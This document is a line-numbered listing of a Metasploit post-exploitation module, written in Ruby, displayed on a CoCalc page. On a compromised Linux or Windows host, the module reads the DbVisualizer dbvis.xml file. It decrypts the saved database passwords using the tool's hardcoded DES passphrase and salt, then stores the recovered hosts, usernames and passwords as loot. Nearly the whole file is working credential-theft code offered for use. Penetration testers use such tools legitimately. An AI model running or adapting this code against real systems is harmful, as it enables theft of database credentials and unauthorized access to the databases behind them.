CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'openssl'
7
require 'digest/md5'
8

9
class MetasploitModule < Msf::Post
10
  include Msf::Post::File
11
  include Msf::Post::Unix
12
  include Msf::Auxiliary::Report
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Multi Gather DbVisualizer Connections Settings',
19
        'Description' => %q{
20
          DbVisualizer stores the user database configuration in dbvis.xml.
21
          This module retrieves the connections settings from this file and decrypts the encrypted passwords.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
25
        'Platform' => %w[linux win],
26
        'SessionTypes' => [ 'meterpreter', 'shell'],
27
        'Compat' => {
28
          'Meterpreter' => {
29
            'Commands' => %w[
30
              stdapi_sys_config_getenv
31
            ]
32
          }
33
        }
34
      )
35
    )
36
    register_options(
37
      [
38
        OptString.new('PASSPHRASE', [false, 'The hardcoded passphrase used for encryption']),
39
        OptInt.new('ITERATION_COUNT', [false, 'The iteration count used in key derivation', 10])
40
      ], super.class
41
    )
42
  end
43

44
  def run
45
    oldversion = false
46

47
    case session.platform
48
    when 'linux'
49
      user = session.shell_command('whoami').chomp
50
      print_status("Current user is #{user}")
51
      if user =~ /root/
52
        user_base = '/root/'
53
      else
54
        user_base = "/home/#{user}/"
55
      end
56
      dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
57
    when 'windows'
58
      if session.type == 'meterpreter'
59
        user_profile = session.sys.config.getenv('USERPROFILE')
60
      else
61
        user_profile = cmd_exec('echo %USERPROFILE%').strip
62
      end
63
      dbvis_file = user_profile + '\\.dbvis\\config70\\dbvis.xml'
64
    end
65

66
    unless file?(dbvis_file)
67
      # File not found, we next try with the old config path
68
      print_status("File not found: #{dbvis_file}")
69
      print_status('This could be an older version of dbvis, trying old path')
70
      case session.platform
71
      when 'linux'
72
        dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
73
      when 'windows'
74
        dbvis_file = user_profile + '\\.dbvis\\config\\dbvis.xml'
75
      end
76
      unless file?(dbvis_file)
77
        print_error("File not found: #{dbvis_file}")
78
        return
79
      end
80
      oldversion = true
81
    end
82

83
    print_status("Reading: #{dbvis_file}")
84
    print_line
85
    raw_xml = ''
86
    begin
87
      raw_xml = read_file(dbvis_file)
88
    rescue EOFError
89
      # If there's nothing in the file, we hit EOFError
90
      print_error("Nothing read from file: #{dbvis_file}, file may be empty")
91
      return
92
    end
93

94
    if oldversion
95
      # Parse old config file
96
      db_table = parse_old_config_file(raw_xml)
97
    else
98
      # Parse new config file
99
      db_table = parse_new_config_file(raw_xml)
100
    end
101

102
    if db_table.rows.empty?
103
      print_status('No database settings found')
104
    else
105
      print_line
106
      print_line(db_table.to_s)
107
      print_good('Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun!')
108
      print_line
109
      # Store found databases in loot
110
      p = store_loot('dbvis.databases', 'text/csv', session, db_table.to_csv, 'dbvis_databases.txt', 'dbvis databases')
111
      print_good("Databases settings stored in: #{p}")
112
    end
113

114
    print_status("Downloading #{dbvis_file}")
115
    p = store_loot('dbvis.xml', 'text/xml', session, read_file(dbvis_file), dbvis_file.to_s, 'dbvis config')
116
    print_good "dbvis.xml saved to #{p}"
117
  end
118

119
  # New config file parse function
120
  def parse_new_config_file(raw_xml)
121
    db_table = Rex::Text::Table.new(
122
      'Header' => 'DbVisualizer Databases',
123
      'Indent' => 2,
124
      'Columns' =>
125
      [
126
        'Alias',
127
        'Type',
128
        'Server',
129
        'Port',
130
        'Database',
131
        'Namespace',
132
        'UserID',
133
        'Password'
134
      ]
135
    )
136

137
    dbs = []
138
    db = {}
139
    dbfound = false
140
    version_found = false
141
    # fetch config file
142
    raw_xml.each_line do |line|
143
      if version_found == false
144
        version_found = find_version(line)
145
      end
146

147
      if line =~ /<Database id=/
148
        dbfound = true
149
      elsif line =~ %r{</Database>}
150
        dbfound = false
151
        if db[:Database].nil?
152
          db[:Database] = ''
153
        end
154
        if db[:Namespace].nil?
155
          db[:Namespace] = ''
156
        end
157
        # save
158
        dbs << db if (db[:Alias] && db[:Type] && db[:Server] && db[:Port])
159
        db = {}
160
      end
161

162
      next unless dbfound == true
163

164
      # get the alias
165
      if line =~ %r{<Alias>([\S+\s+]+)</Alias>}i
166
        db[:Alias] = ::Regexp.last_match(1)
167
      end
168

169
      # get the type
170
      if line =~ %r{<Type>([\S+\s+]+)</Type>}i
171
        db[:Type] = ::Regexp.last_match(1)
172
      end
173

174
      # get the user
175
      if line =~ %r{<Userid>([\S+\s+]+)</Userid>}i
176
        db[:UserID] = ::Regexp.last_match(1)
177
      end
178

179
      # get user password
180
      if line =~ %r{<Password>([\S+\s+]+)</Password>}i
181
        enc_password = ::Regexp.last_match(1)
182
        db[:Password] = decrypt_password(enc_password)
183
      end
184

185
      # get the server
186
      if line =~ %r{<UrlVariable UrlVariableName="Server">([\S+\s+]+)</UrlVariable>}i
187
        db[:Server] = ::Regexp.last_match(1)
188
      end
189

190
      # get the port
191
      if line =~ %r{<UrlVariable UrlVariableName="Port">([\S+\s+]+)</UrlVariable>}i
192
        db[:Port] = ::Regexp.last_match(1)
193
      end
194

195
      # get the database
196
      if line =~ %r{<UrlVariable UrlVariableName="Database">([\S+\s+]+)</UrlVariable>}i
197
        db[:Database] = ::Regexp.last_match(1)
198
      end
199

200
      # get the Namespace
201
      if line =~ %r{<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)</UrlVariable>}i
202
        db[:Namespace] = ::Regexp.last_match(1)
203
      end
204
    end
205

206
    # Fill the tab and report eligible servers
207
    dbs.each do |db|
208
      if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
209
        print_good("Reporting #{db[:Server]}")
210
        report_host(host: db[:Server])
211
      end
212

213
      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:UserID], db[:Password] ]
214
      report_cred(
215
        ip: db[:Server],
216
        port: db[:Port].to_i,
217
        service_name: db[:Type],
218
        username: db[:UserID],
219
        password: db[:Password]
220
      )
221
    end
222
    return db_table
223
  end
224

225
  # New config file parse function
226
  def parse_old_config_file(raw_xml)
227
    db_table = Rex::Text::Table.new(
228
      'Header' => 'DbVisualizer Databases',
229
      'Indent' => 2,
230
      'Columns' =>
231
      [
232
        'Alias',
233
        'Type',
234
        'URL',
235
        'UserID',
236
        'Password'
237
      ]
238
    )
239

240
    dbs = []
241
    db = {}
242
    dbfound = false
243
    version_found = false
244

245
    # fetch config file
246
    raw_xml.each_line do |line|
247
      if version_found == false
248
        vesrion_found = find_version(line)
249
      end
250

251
      if line =~ /<Database id=/
252
        dbfound = true
253
      elsif line =~ %r{</Database>}
254
        dbfound = false
255
        # save
256
        dbs << db if (db[:Alias] && db[:Url])
257
        db = {}
258
      end
259

260
      next unless dbfound == true
261

262
      # get the alias
263
      if line =~ %r{<Alias>([\S+\s+]+)</Alias>}i
264
        db[:Alias] = ::Regexp.last_match(1)
265
      end
266

267
      # get the type
268
      if line =~ %r{<Type>([\S+\s+]+)</Type>}i
269
        db[:Type] = ::Regexp.last_match(1)
270
      end
271

272
      # get the user
273
      if line =~ %r{<Userid>([\S+\s+]+)</Userid>}i
274
        db[:UserID] = ::Regexp.last_match(1)
275
      end
276

277
      # get the user password
278
      if line =~ %r{<Password>([\S+\s+]+)</Password>}i
279
        enc_password = ::Regexp.last_match(1)
280
        db[:Password] = decrypt_password(enc_password)
281
      end
282

283
      # get the server URL
284
      if line =~ %r{<Url>(\S+)</Url>}i
285
        db[:URL] = ::Regexp.last_match(1)
286
      end
287
    end
288

289
    # Fill the tab
290
    dbs.each do |db|
291
      if (db[:URL] =~ %r{[\S+\s+]+/+([\S+\s+]+):[\S+]+}i)
292
        server = ::Regexp.last_match(1)
293
        if ::Rex::Socket.is_ipv4?(server)
294
          print_good("Reporting #{server}")
295
          report_host(host: server)
296
        end
297
      end
298
      db_table << [ db[:Alias], db[:Type], db[:URL], db[:UserID], db[:Password] ]
299
      report_cred(
300
        ip: server,
301
        port: '',
302
        service_name: db[:Type],
303
        username: db[:UserID],
304
        password: db[:Password]
305
      )
306
    end
307
    return db_table
308
  end
309

310
  def find_version(tag)
311
    found = false
312
    if tag =~ %r{<Version>([\S+\s+]+)</Version>}i
313
      found = true
314
      print_good("DbVisualizer version: #{::Regexp.last_match(1)}")
315
    end
316
    found
317
  end
318

319
  def report_cred(opts)
320
    service_data = {
321
      address: opts[:ip],
322
      port: opts[:port],
323
      service_name: opts[:service_name],
324
      protocol: 'tcp',
325
      workspace_id: myworkspace_id
326
    }
327

328
    credential_data = {
329
      post_reference_name: refname,
330
      session_id: session_db_id,
331
      origin_type: :session,
332
      private_data: opts[:password],
333
      private_type: :password,
334
      username: opts[:username]
335
    }.merge(service_data)
336

337
    login_data = {
338
      core: create_credential(credential_data),
339
      status: Metasploit::Model::Login::Status::UNTRIED
340
    }.merge(service_data)
341

342
    create_credential_login(login_data)
343
  end
344

345
  def decrypt_password(enc_password)
346
    enc_password = Rex::Text.decode_base64(enc_password)
347
    dk, iv = get_derived_key
348
    des = OpenSSL::Cipher.new('DES-CBC')
349
    des.decrypt
350
    des.key = dk
351
    des.iv = iv
352
    password = des.update(enc_password) + des.final
353
  end
354

355
  def get_derived_key
356
    key = passphrase + salt
357
    iteration_count.times do
358
      key = Digest::MD5.digest(key)
359
    end
360
    return key[0, 8], key[8, 8]
361
  end
362

363
  def salt
364
    [-114, 18, 57, -100, 7, 114, 111, 90].pack('C*')
365
  end
366

367
  def passphrase
368
    datastore['PASSPHRASE'] || 'qinda'
369
  end
370

371
  def iteration_count
372
    datastore['ITERATION_COUNT'] || 10
373
  end
374
end
375

376